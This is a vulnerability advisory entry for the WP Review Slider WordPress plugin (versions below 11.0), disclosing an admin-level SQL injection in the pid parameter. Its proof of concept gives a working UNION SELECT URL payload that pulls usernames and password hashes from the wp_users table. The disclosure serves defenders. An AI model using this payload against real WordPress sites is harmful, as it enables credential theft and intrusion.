WordPress Plugin Vulnerabilities
WP Review Slider < 11.0 - Admin+ SQL Injection
Description
The plugin does not sanitise and escape the pid parameter when copying a Twitter source, which could allow a high privilege users to perform SQL Injections attacks
Proof of Concept
Create a Twitter Source, copy it via the 'Copy' button, then change the pid parameter in the URL to 1000 UNION ALL SELECT 1,user_login,3,user_pass,5,6,7,8,9,10,11 FROM wp_users LIMIT 1 https://example.com/wp-admin/admin.php?page=wp_fb-get_twitter&taction=copy&tid=1000+UNION+ALL+SELECT+1,user_login,3,user_pass,5,6,7,8,9,10,11+FROM+wp_users+LIMIT+1&_wpnonce=f5e77f3e34
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Felipe de Avila
Submitter
Felipe de Avila
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-31 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)